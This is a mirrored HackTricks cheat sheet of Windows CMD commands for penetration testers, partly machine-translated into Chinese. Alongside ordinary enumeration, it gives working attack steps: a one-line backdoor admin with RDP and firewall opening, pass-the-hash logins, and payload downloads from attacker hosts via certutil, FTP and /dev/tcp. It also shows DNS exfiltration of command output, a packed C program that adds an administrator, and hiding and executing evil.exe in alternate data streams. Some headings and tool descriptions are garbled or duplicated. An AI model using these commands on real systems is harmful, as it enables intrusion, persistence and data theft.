mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
538 lines
20 KiB
Markdown
538 lines
20 KiB
Markdown
# 基本Win CMD for Pentesters
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|
||
|
||
## 系统信息
|
||
|
||
### 版本和补丁信息
|
||
```bash
|
||
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
|
||
systeminfo
|
||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
|
||
wmic computersystem LIST full #Get PC info
|
||
|
||
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
|
||
wmic qfe list brief #Updates
|
||
|
||
hostname
|
||
|
||
DRIVERQUERY #3rd party driver vulnerable?
|
||
```
|
||
### 环境
|
||
```bash
|
||
set #List all environment variables
|
||
```
|
||
一些需要强调的环境变量:
|
||
|
||
* **COMPUTERNAME**:计算机名称
|
||
* **TEMP/TMP**:临时文件夹
|
||
* **USERNAME**:您的用户名
|
||
* **HOMEPATH/USERPROFILE**:主目录
|
||
* **windir**:C:\Windows
|
||
* **OS**:Windows操作系统
|
||
* **LOGONSERVER**:域控制器名称
|
||
* **USERDNSDOMAIN**:与DNS一起使用的域名
|
||
* **USERDOMAIN**:域名
|
||
```bash
|
||
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
|
||
```
|
||
### 挂载的磁盘
|
||
```bash
|
||
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
|
||
wmic logicaldisk get caption,description,providername
|
||
```
|
||
### [防御者](authentication-credentials-uac-and-efs.md#defender)
|
||
|
||
### 回收站
|
||
```bash
|
||
dir C:\$Recycle.Bin /s /b
|
||
```
|
||
### 进程、服务和软件
|
||
```bash
|
||
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
|
||
schtasks /query /fo LIST 2>nul | findstr TaskName
|
||
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
|
||
tasklist /V #List processes
|
||
tasklist /SVC #links processes to started services
|
||
net start #Windows Services started
|
||
wmic service list brief #List services
|
||
sc query #List of services
|
||
dir /a "C:\Program Files" #Installed software
|
||
dir /a "C:\Program Files (x86)" #Installed software
|
||
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
|
||
```
|
||
## 域信息
|
||
```bash
|
||
# Generic AD info
|
||
echo %USERDOMAIN% #Get domain name
|
||
echo %USERDNSDOMAIN% #Get domain name
|
||
echo %logonserver% #Get name of the domain controller
|
||
set logonserver #Get name of the domain controller
|
||
set log #Get name of the domain controller
|
||
gpresult /V # Get current policy applied
|
||
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
|
||
|
||
# Users
|
||
dsquery user #Get all users
|
||
net user /domain #List all users of the domain
|
||
net user <ACCOUNT_NAME> /domain #Get information about that user
|
||
net accounts /domain #Password and lockout policy
|
||
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
|
||
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
|
||
|
||
# Groups
|
||
net group /domain #List of domain groups
|
||
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
|
||
net group "Domain Admins" /domain #List users with domain admin privileges
|
||
net group "domain computers" /domain #List of PCs connected to the domain
|
||
net group "Domain Controllers" /domain #List PC accounts of domains controllers
|
||
wmic group list /format:list # Information about all local groups
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
|
||
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
|
||
|
||
# Computers
|
||
dsquery computer #Get all computers
|
||
net view /domain #Lis of PCs of the domain
|
||
nltest /dclist:<DOMAIN> #List domain controllers
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
|
||
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
|
||
|
||
# Trust relations
|
||
nltest /domain_trusts #Mapping of the trust relationships
|
||
|
||
# Get all objects inside an OU
|
||
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
|
||
```
|
||
### 日志与事件
|
||
```bash
|
||
#Make a security query using another credentials
|
||
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
|
||
```
|
||
## 用户和组
|
||
|
||
### 用户
|
||
```bash
|
||
#Me
|
||
whoami /all #All info about me, take a look at the enabled tokens
|
||
whoami /priv #Show only privileges
|
||
|
||
# Local users
|
||
net users #All users
|
||
dir /b /ad "C:\Users"
|
||
net user %username% #Info about a user (me)
|
||
net accounts #Information about password requirements
|
||
wmic USERACCOUNT Get Domain,Name,Sid
|
||
net user /add [username] [password] #Create user
|
||
|
||
# Other users looged
|
||
qwinsta #Anyone else logged in?
|
||
|
||
#Lauch new cmd.exe with new creds (to impersonate in network)
|
||
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||
|
||
#Check current logon session as administrator using logonsessions from sysinternals
|
||
logonsessions.exe
|
||
logonsessions64.exe
|
||
```
|
||
### 用户组
|
||
```bash
|
||
#Local
|
||
net localgroup #All available groups
|
||
net localgroup Administrators #Info about a group (admins)
|
||
net localgroup administrators [username] /add #Add user to administrators
|
||
|
||
#Domain
|
||
net group /domain #Info about domain groups
|
||
net group /domain <domain_group_name> #Users that belongs to the group
|
||
```
|
||
### 列出会话
|
||
```
|
||
qwinsta
|
||
klist sessions
|
||
```
|
||
### 密码策略
|
||
```
|
||
net accounts
|
||
```
|
||
### 凭证
|
||
```bash
|
||
cmdkey /list #List credential
|
||
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
|
||
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
|
||
```
|
||
### 持久性用户
|
||
```bash
|
||
# Add domain user and put them in Domain Admins group
|
||
net user username password /ADD /DOMAIN
|
||
net group "Domain Admins" username /ADD /DOMAIN
|
||
|
||
# Add local user and put them local Administrators group
|
||
net user username password /ADD
|
||
net localgroup Administrators username /ADD
|
||
|
||
# Add user to insteresting groups:
|
||
net localgroup "Remote Desktop Users" UserLoginName /add
|
||
net localgroup "Debugger users" UserLoginName /add
|
||
net localgroup "Power users" UserLoginName /add
|
||
```
|
||
## 网络
|
||
|
||
### 接口,路由,端口,主机和DNS缓存
|
||
```bash
|
||
ipconfig /all #Info about interfaces
|
||
route print #Print available routes
|
||
arp -a #Know hosts
|
||
netstat -ano #Opened ports?
|
||
type C:\WINDOWS\System32\drivers\etc\hosts
|
||
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
|
||
```
|
||
### 防火墙
|
||
```bash
|
||
netsh firewall show state # FW info, open ports
|
||
netsh advfirewall firewall show rule name=all
|
||
netsh firewall show config # FW info
|
||
Netsh Advfirewall show allprofiles
|
||
|
||
NetSh Advfirewall set allprofiles state off #Turn Off
|
||
NetSh Advfirewall set allprofiles state on #Trun On
|
||
netsh firewall set opmode disable #Turn Off
|
||
|
||
#How to open ports
|
||
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
|
||
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
|
||
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||
|
||
#Enable Remote Desktop
|
||
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||
netsh firewall add portopening TCP 3389 "Remote Desktop"
|
||
::netsh firewall set service remotedesktop enable #I found that this line is not needed
|
||
::sc config TermService start= auto #I found that this line is not needed
|
||
::net start Termservice #I found that this line is not needed
|
||
|
||
#Enable Remote Desktop with wmic
|
||
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
|
||
##or
|
||
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
|
||
|
||
#Enable Remote assistance:
|
||
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
|
||
netsh firewall set service remoteadmin enable
|
||
|
||
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
|
||
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
|
||
|
||
::Connect to RDP (using hash or password)
|
||
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
|
||
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
|
||
```
|
||
### 共享
|
||
```bash
|
||
net view #Get a list of computers
|
||
net view /all /domain [domainname] #Shares on the domains
|
||
net view \\computer /ALL #List shares of a computer
|
||
net use x: \\computer\share #Mount the share locally
|
||
net share #Check current shares
|
||
```
|
||
### Wifi
|
||
|
||
### 无线网络
|
||
```bash
|
||
netsh wlan show profile #AP SSID
|
||
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
|
||
```
|
||
### SNMP
|
||
|
||
### SNMP
|
||
```
|
||
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
||
```
|
||
### 网络接口
|
||
```bash
|
||
ipconfig /all
|
||
```
|
||
### ARP表
|
||
```bash
|
||
arp -A
|
||
```
|
||
## 下载
|
||
|
||
Bitsadmin.exe
|
||
```
|
||
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||
```
|
||
`CertReq.exe`
|
||
```
|
||
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||
```
|
||
Certutil.exe
|
||
|
||
Certutil.exe 是一个 Windows 命令行实用程序,用于执行各种证书操作,包括安装、查看、删除证书等。
|
||
```
|
||
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
|
||
```
|
||
```plaintext
|
||
桌面imgdownldr.exe
|
||
```
|
||
```
|
||
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||
```
|
||
```plaintext
|
||
Diantz.exe
|
||
```
|
||
```
|
||
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||
```
|
||
`Esentutl.exe` 是一个用于管理 Extensible Storage Engine (ESE) 数据库的命令行工具。
|
||
```
|
||
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||
```
|
||
```plaintext
|
||
Expand.exe
|
||
```
|
||
|
||
```plaintext
|
||
Expand.exe
|
||
```
|
||
```
|
||
expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||
```
|
||
`Extrac32.exe`是一个用于解压缩文件的Windows命令行实用程序。
|
||
```
|
||
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
|
||
```
|
||
`findstr.exe` 是一个 Windows 命令行工具,用于在文件中搜索字符串。
|
||
```
|
||
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
|
||
```
|
||
```plaintext
|
||
Ftp.exe
|
||
```
|
||
FTP.exe
|
||
```
|
||
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
||
```
|
||
`GfxDownloadWrapper.exe`
|
||
```
|
||
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||
```
|
||
```plaintext
|
||
Hh.exe
|
||
```
|
||
### Chinese Translation
|
||
```plaintext
|
||
Hh.exe
|
||
```
|
||
```
|
||
HH.exe http://some.url/script.ps1
|
||
```
|
||
`Ieexec.exe` 是一个用于执行命令的实用程序。
|
||
```
|
||
ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||
```
|
||
`Makecab.exe`是Windows操作系统中用于创建和提取压缩文件的命令行实用程序。
|
||
```
|
||
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
|
||
```
|
||
`MpCmdRun.exe`
|
||
```
|
||
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
|
||
```
|
||
```plaintext
|
||
Replace.exe is a powerful tool that allows you to replace one or more files with another. This can be useful for executing malicious files in place of legitimate ones. To use Replace.exe, follow these steps:
|
||
|
||
1. Open a command prompt with administrative privileges.
|
||
2. Navigate to the directory containing Replace.exe.
|
||
3. Use the following command to replace a file:
|
||
replace.exe [target file] [replacement file]
|
||
4. You can also use wildcards (*) to replace multiple files at once:
|
||
replace.exe *.txt malicious.txt
|
||
5. Be cautious when using Replace.exe, as it can be detected by antivirus software. Consider using it in combination with other techniques to avoid detection.
|
||
```
|
||
```
|
||
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||
```
|
||
`Excel.exe`
|
||
```
|
||
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
|
||
```
|
||
```plaintext
|
||
Powerpnt.exe
|
||
```
|
||
---
|
||
```plaintext
|
||
Powerpnt.exe
|
||
```
|
||
```
|
||
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||
```
|
||
Squirrel.exe
|
||
```
|
||
squirrel.exe --download [url to package]
|
||
```
|
||
```plaintext
|
||
Update.exe
|
||
```
|
||
```
|
||
Update.exe --download [url to package]
|
||
```
|
||
Winword.exe
|
||
```
|
||
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||
```
|
||
```plaintext
|
||
wsl.exe
|
||
```
|
||
```
|
||
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
|
||
```
|
||
## 其他
|
||
```bash
|
||
cd #Get current dir
|
||
cd C:\path\to\dir #Change dir
|
||
dir #List current dir
|
||
dir /a:h C:\path\to\dir #List hidden files
|
||
dir /s /b #Recursive list without shit
|
||
time #Get current time
|
||
date #Get current date
|
||
shutdown /r /t 0 #Shutdown now
|
||
type <file> #Cat file
|
||
|
||
#Runas
|
||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
|
||
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
|
||
|
||
#Hide
|
||
attrib +h file #Set Hidden
|
||
attrib -h file #Quit Hidden
|
||
|
||
#Give full control over a file that you owns
|
||
icacls <FILE_PATH> /t /e /p <USERNAME>:F
|
||
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
|
||
|
||
#Recursive copy to smb
|
||
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
|
||
|
||
#exe2bat to transform exe file in bat file
|
||
|
||
#ADS
|
||
dir /r #Detect ADS
|
||
more file.txt:ads.txt #read ADS
|
||
powershell (Get-Content file.txt -Stream ads.txt)
|
||
|
||
# Get error messages from code
|
||
net helpmsg 32 #32 is the code in that case
|
||
```
|
||
### 绕过字符黑名单
|
||
```bash
|
||
echo %HOMEPATH:~6,-11% #\
|
||
who^ami #whoami
|
||
```
|
||
### DOSfuscation
|
||
|
||
生成一个混淆的CMD命令行
|
||
```powershell
|
||
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
|
||
cd Invoke-DOSfuscation
|
||
Import-Module .\Invoke-DOSfuscation.psd1
|
||
Invoke-DOSfuscation
|
||
help
|
||
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
|
||
encoding
|
||
```
|
||
### 监听地址 ACL
|
||
|
||
您可以在[http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/)上进行监听而无需管理员权限。
|
||
```bash
|
||
netsh http show urlacl
|
||
```
|
||
### 手动 DNS shell
|
||
|
||
**攻击者**(Kali)必须使用以下两个选项之一:
|
||
```bash
|
||
sudo responder -I <iface> #Active
|
||
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
|
||
```
|
||
#### 受害者
|
||
|
||
_**for /f tokens**_ \_\*\*\_技术: 这使我们能够执行命令,获取每行的前X个单词,并通过DNS发送到我们的服务器
|
||
```
|
||
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
|
||
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
|
||
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
|
||
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
|
||
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
|
||
#More complex commands
|
||
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
|
||
```
|
||
你也可以**重定向**输出,然后**读取**它。
|
||
```
|
||
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
|
||
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
|
||
```
|
||
## 从C代码调用CMD
|
||
```c
|
||
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
|
||
|
||
// When executed by Administrator this program will create a user and then add him to the administrators group
|
||
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
|
||
// upx -9 addmin.exe
|
||
|
||
int main (){
|
||
int i;
|
||
i=system("net users otherAcc 0TherAcc! /add");
|
||
i=system("net localgroup administrators otherAcc /add");
|
||
return 0;
|
||
}
|
||
```
|
||
## 备用数据流速查表(ADS/Alternate Data Stream)
|
||
|
||
**示例取自[https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)。里面还有很多!**
|
||
```bash
|
||
## Selected Examples of ADS Operations ##
|
||
|
||
### Adding Content to ADS ###
|
||
# Append executable to a log file as an ADS
|
||
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
|
||
# Download a script directly into an ADS
|
||
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||
|
||
### Discovering ADS Content ###
|
||
# List files and their ADS
|
||
dir /R
|
||
# Use Sysinternals tool to list ADS of a file
|
||
streams.exe <c:\path\to\file>
|
||
|
||
### Extracting Content from ADS ###
|
||
# Extract an executable stored in an ADS
|
||
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
|
||
|
||
### Executing ADS Content ###
|
||
# Execute an executable stored in an ADS using WMIC
|
||
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
|
||
# Execute a script stored in an ADS using PowerShell
|
||
powershell -ep bypass - < c:\temp:ttt
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> - <a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在**网络安全公司**工作吗?想要看到你的**公司在HackTricks中宣传**吗?或者想要访问**PEASS的最新版本或下载HackTricks的PDF**吗?查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获取[**官方PEASS & HackTricks周边**](https://peass.creator-spring.com)
|
||
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我的 **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
* 通过向**hacktricks仓库**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧**。
|
||
|
||
</details>
|